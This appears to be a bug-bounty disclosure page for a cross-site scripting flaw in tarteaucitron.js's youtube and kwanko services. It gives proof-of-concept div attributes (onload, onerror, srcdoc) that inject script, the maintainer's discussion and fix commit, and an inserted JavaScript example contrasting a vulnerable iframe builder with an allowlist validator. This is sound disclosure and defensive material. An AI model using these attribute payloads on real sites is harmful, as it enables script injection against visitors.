youtube service is vulnerable to XSS vulnerability in amauric/tarteaucitron.js

Valid

Reported on

Jul 2nd 2023


Description

If an attacker is able to insert a div with attributes on a page where the youtube service is enabled, they can craft a width attribute that would allow them to execute arbitrary JS on the page.

(Other attributes like theme or controls are also vulnerable to this.)

Proof of Concept

    <!DOCTYPE html>
    <html lang="en">
    <head>
        <title>TAC XSS</title>
        <script src="tarteaucitron.js"></script>
        <script>
        (tarteaucitron.job = tarteaucitron.job || []).push('youtube');
        tarteaucitron.init({ readmoreLink: '/foo', orientation: 'bottom' });
        </script>
    </head>
    <body>
        <div class="youtube_player" videoID="vo-SxWZ7tyM" width='" onload="alert(`xss`);"'></div>
    </body>
    </html>

The srcdoc attribute can also be used for this (and should probably not be allowed):

    <div class="youtube_player" videoID="vo-SxWZ7tyM" srcdoc='<script>alert(`xss`)</script>'></div>

Impact

Imagine a website where users can post comments containing limited HTML (but not <script> tags). This vulnerability would allow an attacker to bypass this restriction and inject JS in the page.
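The pattern behind the report, as an added example that is not code from tarteaucitron.js: an iframe assembled by string concatenation from the div's attributes, exercised with the width payload from the proof of concept, beside an allowlist validator that refuses any attribute value not matching a tight format and drops any attribute (such as srcdoc) that the service has no reason to accept. The function names, the attribute formats and the embed URL are my assumptions for the demonstration, not the library's.

```javascript
// Added example (not tarteaucitron.js code). The vulnerable builder mirrors the
// shape of code the report describes: attribute values are concatenated into
// an iframe tag without validation. The safe builder only emits markup once
// every attribute has passed an allowlist check. All names are assumptions.

// Constructed inputs: one benign attribute set, one carrying the report's payload.
const benignAttrs = { videoID: 'vo-SxWZ7tyM', width: '640', height: '360' };
const payloadAttrs = { videoID: 'vo-SxWZ7tyM', width: '" onload="alert(`xss`);"' };

// Vulnerable: raw concatenation. A double quote in width closes the attribute
// and whatever follows becomes a new attribute, here an onload handler.
function buildYoutubeIframeVulnerable(attrs) {
  return '<iframe src="https://www.youtube-nocookie.com/embed/' + attrs.videoID +
    '" width="' + (attrs.width || '') + '" height="' + (attrs.height || '') +
    '" frameborder="0"></iframe>';
}

// Per-attribute formats. Anything not listed here is not allowed at all, which
// is how srcdoc gets rejected; anything listed must match its pattern exactly.
const ATTRIBUTE_RULES = {
  videoID:  /^[A-Za-z0-9_-]{11}$/,   // YouTube IDs: 11 URL-safe characters
  width:    /^\d{1,4}%?$/,           // pixels or a percentage, nothing else
  height:   /^\d{1,4}%?$/,
  theme:    /^(dark|light)$/,
  controls: /^[01]$/,
};

// Returns { ok: true, attrs } holding only validated values, or
// { ok: false, rejected } naming every attribute that failed.
function validateYoutubeAttrs(attrs) {
  const clean = {};
  const rejected = [];
  for (const [name, value] of Object.entries(attrs)) {
    // hasOwnProperty guards against names like "constructor" hitting the prototype.
    if (!Object.prototype.hasOwnProperty.call(ATTRIBUTE_RULES, name)) {
      rejected.push(name);
      continue;
    }
    if (!ATTRIBUTE_RULES[name].test(String(value))) {
      rejected.push(name);
      continue;
    }
    clean[name] = String(value);
  }
  if (!('videoID' in clean) && !rejected.includes('videoID')) rejected.push('videoID');
  return rejected.length ? { ok: false, rejected } : { ok: true, attrs: clean };
}

// Safe builder: same markup, but built only from validated values.
function buildYoutubeIframeSafe(attrs) {
  const result = validateYoutubeAttrs(attrs);
  if (!result.ok) return null;
  const a = result.attrs;
  return '<iframe src="https://www.youtube-nocookie.com/embed/' + a.videoID +
    '" width="' + (a.width || '') + '" height="' + (a.height || '') +
    '" frameborder="0"></iframe>';
}

// Detection helper for the demo: counts onload/onerror attributes in markup,
// which is the symptom of an attribute-context breakout.
function countEventHandlerAttrs(html) {
  return (html.match(/\son(?:load|error)=/g) || []).length;
}
```

Validation of this kind is stricter than encoding: a width of `640` or `100%` is all the service ever needs, so a value containing quotes or spaces is simply refused rather than escaped, and an attribute the service does not define is never copied into the output.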

We are processing your report and will contact the amauric/tarteaucitron.js team within 24 hours. 3 months ago
Pierre Rudloff
3 months ago

Researcher


Services that build <img> tags are also vulnerable. For example, the kwanko service:

    <div class="tac_kwanko" data-mclic='" onerror="alert(`xss`);"'></div>
We created a GitHub Issue asking the maintainers to create a SECURITY.md 3 months ago
We have contacted a member of the amauric/tarteaucitron.js team and are waiting to hear back 3 months ago
Amauri
2 months ago

Maintainer


Hi

Thanks for your report :)

The attrs are already retrieved by a custom function https://github.com/AmauriC/tarteaucitron.js/blob/master/tarteaucitron.js#L2085. If I filter the result with this function, it should be enough? https://github.com/AmauriC/tarteaucitron.js/blob/master/tarteaucitron.js#L1808

Thanks!

Pierre Rudloff
2 months ago

Researcher


The best practice here would be to stop building HTML with concatenation and instead use DOM methods like createElement() and setAttribute(). However, this would require rewriting a lot of services code.

I guess calling fixSelfXSS() in getElemAttr() could be a quicker fix.

We have sent a follow up to the amauric/tarteaucitron.js team. We will try again in 7 days. 2 months ago
Amauri CHAMPEAUX validated this vulnerability 2 months ago

Thanks, I've applied this quick fix and made a note to review the code to create HTML with the DOM functions. https://github.com/AmauriC/tarteaucitron.js/commit/c4c2fcf2b2212ce968bdcae145bb74283c441e5f

Pierre Rudloff has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Amauri CHAMPEAUX marked this as fixed in v1.13.1 with commit c4c2fc 2 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
Amauri CHAMPEAUX published this vulnerability 2 months ago